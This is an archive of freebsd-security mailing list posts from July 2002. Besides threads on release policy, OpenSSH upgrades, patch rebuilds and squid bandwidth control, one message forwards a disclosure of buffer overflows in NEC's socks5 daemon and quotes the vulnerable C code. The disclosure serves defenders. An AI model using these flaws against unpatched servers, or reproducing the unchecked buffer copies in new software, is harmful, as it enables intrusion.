old. You in particular keep regurgitating the >same crap that has been covered time and again.... > >[Remainder of long flame deleted] You're off-topic. 
;-)

--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jul 3 8:44:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 16DAE37B401 for ; Wed, 3 Jul 2002 08:44:44 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 407E643E31 for ; Wed, 3 Jul 2002 08:44:43 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.4) with ESMTP id g63FiZmW023125 for ; Wed, 3 Jul 2002 11:44:36 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020703114631.04f94d20@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 03 Jul 2002 11:48:07 -0400 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Has anyone run the socks5 daemon below as a chrooted and non privileged user ? It binds to 1080, is there any reason it needs to even run as root ?

---Mike

>X-Virus-Scanned: By Sentex Communications (avscan2/20020220)
>
>Dear Dave Ahmad,
>
>Nearly same bugs exist in reference socks5 implementation by NEC. There
>are few different overflows, all look not exploitable in socks5v1.0r11,
>at least on majority of platforms due to specific data layout, but may
>be exploitable in earlier versions or in derived software. Examples:
>
>1. in SOCKS5 User-Name parsing:
>
>proxy.c:
>
>static int GetString(S5IOHandle fd, char *buf, double *timerm) {
>    u_char len;
>
>    buf[0] = '\0';
>    if (S5IORecv(fd, NULL, (char *)&len, 1, 0, UPWD_IOFLAGS, timerm) != 1) return -1;
>    if (len == 0) return 0;
>
>    if (S5IORecv(fd, NULL, buf, len, 0, UPWD_IOFLAGS, timerm) != len) return -1;
>    buf[len] = '\0';
>    return len;
>}
>
>problem is that target username buffer is 128 bytes.
>
>2. In SOCKS4 username parsing:
>
>proxy.c:
>
>static int HandleS4Connection(S5LinkInfo *pri, S5IOInfo *iio, list *auths, double *timerm) {
>...
>    char buf[256+256+8],
>...
>
>    for (tmp = buf, *tmp = '\0'; tmp < buf+sizeof(buf)-1; *++tmp = '\0') {
>        if (S5IORecv(iio->fd, iio, tmp, 1, 0, PROXY_IOFLAGS, timerm) != 1) {
>            S5LogUpdate(S5LogDefaultHandle, S5_LOG_DEBUG(0), 0, "Socks4: Read failed: %m");
>            return EXIT_ERR;
>        }
>
>        if (*tmp == '\0') break;
>    }
>
>    S5LogUpdate(S5LogDefaultHandle, S5_LOG_DEBUG(10), 0, "Socks4: Read user: %s", buf);
>
>    strcpy(pri->srcUser, buf);
>
>pri->srcUser is 128 bytes...
>
>3. in reading hostname
>
>struct sockaddr_name {
>    unsigned short sn_family;
>    unsigned short sn_port;
>    char sn_name[255];
>};
>
>
>protocol.c:
>    memcpy(result->sn.sn_name, buf+RP_HOSTOFF+1, (u_char)buf[RP_HOSTOFF]);
>    memcpy(&result->sn.sn_port, buf+RP_HOSTOFF+1+buf[RP_HOSTOFF], sizeof(u_short));
>    result->sn.sn_name[(int)(u_char)buf[RP_HOSTOFF]] = '\0';
>
>(off-by-one vuln).
>
>
>I've got no response from authors.
>
>
>--
>~/ZARAZA
>Alcoholism poses a particular problem. (Lem)

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jul 3 9:11:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4493F37B400 for ; Wed, 3 Jul 2002 09:11:36 -0700 (PDT) Received: from portal.eltex.ru (eltex-gw2.nw.ru [195.19.203.86]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4DF2243E09 for ; Wed, 3 Jul 2002 09:11:35 -0700 (PDT) (envelope-from ark@eltex.ru) Received: (from root@localhost) by portal.eltex.ru (8.12.3/8.11.3) id g63GBWrF075506; Wed, 3 Jul 2002 20:11:32 +0400 (MSD) (envelope-from ark@eltex.ru) Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by portal.eltex.ru (8.12.3/8.11.3av) with SMTP id g63GBNDf075489; Wed, 3 Jul 2002 20:11:23 +0400 (MSD) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: by yaksha.eltex.ru (ssmtp TIS-1.1alpha, 17 Jan 2002); Wed, 3 Jul 2002 20:01:28 +0400 Received: from undisclosed-intranet-sender id smtpdbZ8705; Wed Jul 3 20:01:19 2002 Date: Wed, 3 Jul 2002 20:02:34 +0400 Message-Id: <200207031602.UAA03991@paranoid.eltex.ru> In-Reply-To: <5.1.0.14.0.20020703114631.04f94d20@marble.sentex.ca> from "Mike Tancsa " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Fwd: NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Pro To: mike@sentex.net Cc: security@freebsd.org X-Virus-Scanned: by Eltex TC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

I think it is because of icmp
extensions (can't remember if remote socket is allowed to bind privileged port but that may be a reason too)

Mike Tancsa said :
> Has anyone run the socks5 daemon below as a chrooted and non privileged
> user ? It binds to 1080, is there any reason it needs to even run as root ?

CU in Hell /Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jul 3 10:23:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4440937B400 for ; Wed, 3 Jul 2002 10:23:46 -0700 (PDT) Received: from malkavian.org (malkavian.org [206.136.132.23]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC48543E3B for ; Wed, 3 Jul 2002 10:23:45 -0700 (PDT) (envelope-from rbw@myplace.org) Received: from malkavian.org (rbw@localhost [127.0.0.1]) by malkavian.org (8.12.3/8.12.3) with ESMTP id g63HNc9E005410; Wed, 3 Jul 2002 13:23:38 -0400 (EDT) (envelope-from rbw@myplace.org) Received: (from rbw@localhost) by malkavian.org (8.12.3/8.12.3/Submit) id g63HNbaa005409; Wed, 3 Jul 2002 10:23:37 -0700 (MST) X-Authentication-Warning: malkavian.org: rbw set sender to rbw@myplace.org using -f Date: Wed, 3 Jul 2002 10:23:37 -0700 From: "brian j.
peterson" To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: security fixes Message-ID: <20020703172337.GD32703@malkavian.org> Mail-Followup-To: Brett Glass , freebsd-security@FreeBSD.ORG References: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> <4.3.2.7.2.20020702155758.00e9a2c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020702155758.00e9a2c0@localhost> User-Agent: Mutt/1.4i X-URL: http://rbw.myplace.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [freebsd-security subscribers: this is a response to what i consider to be a horribly off-topic thread, so if you prefer to avoid such posts, please read no further and accept my apologies for subjecting you to even this much.] On Tue, Jul 02, 2002 at 04:06:13PM -0600, Brett Glass wrote: > > With the flurry of changes going on (including the OpenSSH hole and libc > hole in the base install and the Apache vulnerability in the ports and > packages), it'd be nice to see an interim release. Who here would be > in favor of that? Who, on the FreeBSD Core Team, might make the decision who here would be in favor of that? very few, i would hope. i know the last thing i want the FreeBSD team to do is spend all their limited volunteered time (and limited donated resources) on creating a new -RELEASE for every new security problem that is discovered. this would be a gross waste. they already spend plenty of time fixing the security problems as they crop up, so apply the patches they supply and recompile what you need to and be happy they are so responsive and informative and responsible. > to do an interim release before 4.7 (scheduled for October)? 
(Yes, it > takes work to put out a release, but do we really want everyone who wants > a secure system to have to install from -STABLE snapshots, running the > risk of picking a bad day, for four months?) of course we don't want a person who wants a secure system to install from a -STABLE snapshot, that's why it's not recommended. installs should be done with a -RELEASE and then updated as per the requirements of the user. if the user simply wants to keep up to date with the latest changes, he should update to (and probably track) RELENG_x and subscribe himself to the freebsd-stable mailing list. if the user desires security above all else, he should update to RELENG_x_y and subscribe himself to the freebsd-security-notifications mailing list. Brett? i've watched you harp on the same damn point for months now, and i know i'm not the only one getting tired of it. really, we get it. we know you want a brand new installable build for every new security problem that is discovered. i've watched you start new threads on this topic. i've watched you steer completely unrelated threads to this topic. i've watched you start new threads on very specific topics for very specific security bugs only to take flying leaps of logic to conclude (in essence) "clearly, we need constantly updating -RELEASE builds otherwise we're being grossly unethical, mean, and also probably smelly." WE. GET. IT. we also get that you're full of sound and fury (and whining and moaning), and little else. you talk and talk and talk and talk, but you don't actually try to DO anything. would a brand new installable build every few days be nice? sure. is it feasible? not currently, and probably not any time soon. and even if there were a new installable build every few days, what then? users would still have to go back and update their already installed systems. users would still have to keep informed about updates to FreeBSD. 
you seem to think that the update mechanism isn't good enough, and the FreeBSD developers would seem to agree; they are working on binary upgrades (as opposed to patch/compile upgrades), but these things don't happen overnight. and they don't happen any faster with you complaining about things. and they certainly wouldn't happen any faster if all of FreeBSD's resources were tied up in building new -RELEASEs every twelve minutes. if you are too impatient to wait for change to happen, MAKE it happen. get directly involved. contribute something tangible. that's the beauty of this FreeBSD thing; if you actually have something to contribute, you can actually make a real difference. -Brian -- --===-----=======-----------=============-----------------=================== bjp aka rbw | and did you exchange a walk on part in the war rbw@myplace.org | for a lead role in a cage? ===================-----------------=============-----------=======-----===-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 15:26:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B49F637B400 for ; Wed, 3 Jul 2002 15:26:30 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2AB2143E31 for ; Wed, 3 Jul 2002 15:26:30 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.226.230] by mail.gbronline.com (SMTPD32-7.10) id A9B9665D0100; Wed, 03 Jul 2002 17:24:57 -0500 Message-ID: <0f8501c222e0$9982cca0$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "brian j. 
peterson" , "Brett Glass" Cc: References: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> <4.3.2.7.2.20020702155758.00e9a2c0@localhost> <20020703172337.GD32703@malkavian.org> Subject: Re: security fixes Date: Wed, 3 Jul 2002 17:25:55 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yep, and if *I* wanted a new release every time the maintainers got around to building one after disclosure of a security issue, I'd go back to Windoze ... :-) [tongue bleeding from compression betwixt teeth & cheek...] KDK ----- Original Message ----- From: "brian j. peterson" To: "Brett Glass" Cc: Sent: Wednesday, July 03, 2002 12:23 PM Subject: Re: security fixes > [freebsd-security subscribers: this is a response to what i consider to > be a horribly off-topic thread, so if you prefer to avoid such posts, > please read no further and accept my apologies for subjecting you to > even this much.] > > > On Tue, Jul 02, 2002 at 04:06:13PM -0600, Brett Glass wrote: > > > > With the flurry of changes going on (including the OpenSSH hole and libc > > hole in the base install and the Apache vulnerability in the ports and > > packages), it'd be nice to see an interim release. Who here would be > > in favor of that? Who, on the FreeBSD Core Team, might make the decision > > who here would be in favor of that? very few, i would hope. > > i know the last thing i want the FreeBSD team to do is spend all their > limited volunteered time (and limited donated resources) on creating a new > -RELEASE for every new security problem that is discovered. this would be > a gross waste. 
they already spend plenty of time fixing the security > problems as they crop up, so apply the patches they supply and recompile > what you need to and be happy they are so responsive and informative and > responsible. > > > > to do an interim release before 4.7 (scheduled for October)? (Yes, it > > takes work to put out a release, but do we really want everyone who wants > > a secure system to have to install from -STABLE snapshots, running the > > risk of picking a bad day, for four months?) > > of course we don't want a person who wants a secure system to install from > a -STABLE snapshot, that's why it's not recommended. installs should be > done with a -RELEASE and then updated as per the requirements of the user. > if the user simply wants to keep up to date with the latest changes, he > should update to (and probably track) RELENG_x and subscribe himself to > the freebsd-stable mailing list. if the user desires security above all > else, he should update to RELENG_x_y and subscribe himself to the > freebsd-security-notifications mailing list. > > Brett? i've watched you harp on the same damn point for months now, and > i know i'm not the only one getting tired of it. really, we get it. we > know you want a brand new installable build for every new security problem > that is discovered. i've watched you start new threads on this topic. > i've watched you steer completely unrelated threads to this topic. i've > watched you start new threads on very specific topics for very specific > security bugs only to take flying leaps of logic to conclude (in essence) > "clearly, we need constantly updating -RELEASE builds otherwise we're > being grossly unethical, mean, and also probably smelly." WE. GET. IT. > > we also get that you're full of sound and fury (and whining and moaning), > and little else. you talk and talk and talk and talk, but you don't > actually try to DO anything. would a brand new installable build every > few days be nice? sure. is it feasible? 
not currently, and probably > not any time soon. and even if there were a new installable build every > few days, what then? users would still have to go back and update their > already installed systems. users would still have to keep informed about > updates to FreeBSD. you seem to think that the update mechanism isn't > good enough, and the FreeBSD developers would seem to agree; they are > working on binary upgrades (as opposed to patch/compile upgrades), but > these things don't happen overnight. and they don't happen any faster > with you complaining about things. and they certainly wouldn't happen > any faster if all of FreeBSD's resources were tied up in building new > -RELEASEs every twelve minutes. if you are too impatient to wait for > change to happen, MAKE it happen. get directly involved. contribute > something tangible. that's the beauty of this FreeBSD thing; if you > actually have something to contribute, you can actually make a real > difference. > > -Brian > > -- > --===-----=======-----------=============-----------------================ === > bjp aka rbw | and did you exchange a walk on part in the war > rbw@myplace.org | for a lead role in a cage? 
> ===================-----------------=============-----------=======-----===- - > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 15:54: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E36D37B400 for ; Wed, 3 Jul 2002 15:54:00 -0700 (PDT) Received: from smtp.netcabo.pt (smtp.netcabo.pt [212.113.174.9]) by mx1.FreeBSD.org (Postfix) with ESMTP id A6CD643E09 for ; Wed, 3 Jul 2002 15:53:58 -0700 (PDT) (envelope-from hununu@netcabo.pt) Received: from cheetah ([213.22.31.242]) by smtp.netcabo.pt with Microsoft SMTPSVC(5.0.2195.4905); Wed, 3 Jul 2002 23:53:22 +0100 From: "Hununu" Organization: Artists, Inc. To: Date: Wed, 3 Jul 2002 23:53:42 +0100 MIME-Version: 1.0 Subject: Re: limiting proxy access Reply-To: hununu@netcabo.pt Message-ID: <3D238E86.462.215A199@localhost> In-reply-to: <004301c22237$53670000$21020a0a@mti.ee.itb.ac.id> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body X-OriginalArrivalTime: 03 Jul 2002 22:53:22.0463 (UTC) FILETIME=[6EAEC2F0:01C222E4] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 3 Jul 2002 at 9:14, Asep Ruspeni wrote: > i use netstat to monitor which computer accessing proxy. sometimes manually deny > ip/tcp computer which consume much bandwidth than others using ipfw and > restarting squid daemon. (eg. 
using download accelerator plus which support > proxy could consume great amount bandwidth available) > > my question : > > is there any script i could use, to maintain bandwidth limitation so it will > automatically stop/limit bandwidth consuming without restarting squid daemon. This is not the right mailing list for this. FreeBSD-questions. Anyway, if you block the ip using ipfw, you do not need to re-start squid. You could also try to do a "man dummynet" and feel in heaven. If you really want to get high with bandwith control, you should try AltQ. :-] ...:-=>> The freaking Mail Band <<=-:... hununu@netcabo.pt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 16:34:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A840A37B400 for ; Wed, 3 Jul 2002 16:34:10 -0700 (PDT) Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0AC0743E09 for ; Wed, 3 Jul 2002 16:34:10 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Wed, 3 Jul 2002 19:34:07 -0400 From: Klaus Steden To: freebsd-security@freebsd.org Subject: PGP5 port Message-ID: <20020703193407.G762@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hopefully, this isn't a question that's been asked and answered already ... but can someone explain to me why the port of PGP5, when invoked, doesn't exit unless killed by signal 9? I'm not sure why, but if there's a reason to it, could someone please shed a little light on the matter? It's annoying the hell out of me to have to kill -9 it every time I use it. 
thanks, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 17:36:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C428D37B400; Wed, 3 Jul 2002 17:36:04 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 37DC743E09; Wed, 3 Jul 2002 17:36:04 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1DCBB534B; Thu, 4 Jul 2002 02:36:02 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: stable@freebsd.org Subject: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1 From: Dag-Erling Smorgrav Date: 04 Jul 2002 02:36:01 +0200 Message-ID: Lines: 16 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I finished the upgrade a little over an hour ago, and my post-commit buildworld just completed. It should now be safe to upgrade. Privilege separation is turned off by default, because it breaks Kerberos ticket passing. If you don't use ticket passing, or don't know what Kerberos is, it should be safe to turn privilege separation on in /etc/ssh/sshd_config (after make world and mergemaster, of course.) Please stay alert for any signs of ssh (particularly sshd) trouble, or unexpected changes in OpenSSH's behaviour, including unexpected changes in configuration defaults. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 19:26:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5D75D37B400 for ; Wed, 3 Jul 2002 19:26:44 -0700 (PDT) Received: from hotmail.com (f213.law15.hotmail.com [64.4.23.213]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26BBC43E52 for ; Wed, 3 Jul 2002 19:26:44 -0700 (PDT) (envelope-from amyshaftoe@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 3 Jul 2002 19:26:44 -0700 Received: from 12.237.225.124 by lw15fd.law15.hotmail.msn.com with HTTP; Thu, 04 Jul 2002 02:26:43 GMT X-Originating-IP: [12.237.225.124] From: "Amy Shaftoe" To: freebsd-security@freebsd.org Subject: Rebuilding the static programs Date: Wed, 03 Jul 2002 21:26:43 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 04 Jul 2002 02:26:44.0067 (UTC) FILETIME=[3D088330:01C22302] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since I don't have enough disk space to do a make world on my 4.6-RELEASE system, I was going to rebuild libc and the static programs individually after applying the FreeBSD-SA-02:28.resolv patch. I applied the patch then did a "make", "make install" and a "make clean" in /usr/src/lib/libc. That went fine. Then I did the same in /usr/src/sbin and that when fine. But in /usr/src/bin it dies with this: >===> rmail >Warning: Object directory not changed from original /usr/src/bin/rmail >ln -sf >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h >sm_os.h >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. 
-Wall >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or directory >*** Error code 1 > >Stop in /usr/src/bin/rmail. >*** Error code 1 > >Stop in /usr/src/bin. Is this expected behavior? Should you be able to rebuild the system in this manner? _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 22:18: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5584337B400 for ; Wed, 3 Jul 2002 22:18:05 -0700 (PDT) Received: from relay.sambolian.net.nz (203-79-83-205.cable.paradise.net.nz [203.79.83.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04A1243E09 for ; Wed, 3 Jul 2002 22:18:04 -0700 (PDT) (envelope-from andy@sambolian.net.nz) Received: from grace.sambolian.net.nz (grace.sambolian.net.nz [192.168.0.11]) by relay.sambolian.net.nz (Postfix) with ESMTP id 4B6C357316 for ; Thu, 4 Jul 2002 17:18:02 +1200 (NZST) Received: by grace.sambolian.net.nz (Postfix, from userid 80) id 7B293FEB7; Thu, 4 Jul 2002 17:18:32 +1200 (NZST) Received: from 192.168.0.1 ( [192.168.0.1]) as user andy@imap.sambolian.net.nz by webmail.sambolian.net.nz with HTTP; Thu, 4 Jul 2002 17:18:32 +1200 Message-ID: <1025759912.3d23daa852532@webmail.sambolian.net.nz> Date: Thu, 4 Jul 2002 17:18:32 +1200 From: Andrew Thompson To: Amy Shaftoe Cc: freebsd-security@freebsd.org Subject: Re: Rebuilding the static programs References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 
Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Looks like you need to do a make in /usr/src/lib/libsm, as it can not find the file libsm.a in that directory. --Andrew Quoting Amy Shaftoe : > Since I don't have enough disk space to do a make world on my > 4.6-RELEASE system, I was going to rebuild libc and the static > programs individually after applying the FreeBSD-SA-02:28.resolv > patch. > > I applied the patch then did a "make", "make install" and a "make > clean" in /usr/src/lib/libc. That went fine. Then I did the same > in /usr/src/sbin and that when fine. But in /usr/src/bin it dies > with this: > > >===> rmail > >Warning: Object directory not changed from original /usr/src/bin/rmail > >ln -sf > >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h > >sm_os.h > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > > >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > > >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a > >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or directory > >*** Error code 1 > > > >Stop in /usr/src/bin/rmail. > >*** Error code 1 > > > >Stop in /usr/src/bin. > > Is this expected behavior? Should you be able to rebuild the > system in this manner? 
> > > _________________________________________________________________ > MSN Photos is the easiest way to share and print your photos: > http://photos.msn.com/support/worldwide.aspx > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 23:41:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C33837B400; Wed, 3 Jul 2002 23:41:13 -0700 (PDT) Received: from mail7.ec.rr.com (fe7.southeast.rr.com [24.93.67.54]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9462743E5E; Wed, 3 Jul 2002 23:41:12 -0700 (PDT) (envelope-from freebsd@ec.rr.com) Received: from makayla ([66.26.7.34]) by mail7.ec.rr.com with Microsoft SMTPSVC(5.5.1877.757.75); Thu, 4 Jul 2002 01:29:34 -0400 Date: Thu, 4 Jul 2002 01:31:31 -0400 From: Michael Sharp To: freebsd-security@FreeBSD.ORG Cc: freebsd-questions@FreeBSD.ORG Subject: ssk-keygen Message-Id: <20020704013131.1f7a014f.freebsd@ec.rr.com> X-Mailer: FreeBSD 4.6 http://www.freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I did a cvsup of RELENG_4 about 2 hours ago ( July 4th @ 12:05 am )and noticed the new openssh3.4p1 and pam.conf source so I decided to make world. On reboot, ssh-keygen fails to make RSA keys because in rc.network there is no -t rsa option when running ssh-keygen. ***I changed it*** and all is well. 
This is likely to come up on the questions and security list for those that did a cvsup at about the same time I did. I'm sure it's been discovered and fixed by now.

***
if [ ! -f /etc/ssh/ssh_host_key ]; then
        echo ' creating ssh RSA host key';
        /usr/bin/ssh-keygen -t rsa -N "" -f /etc/ssh/ssh_host_key
fi
***

Michael

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

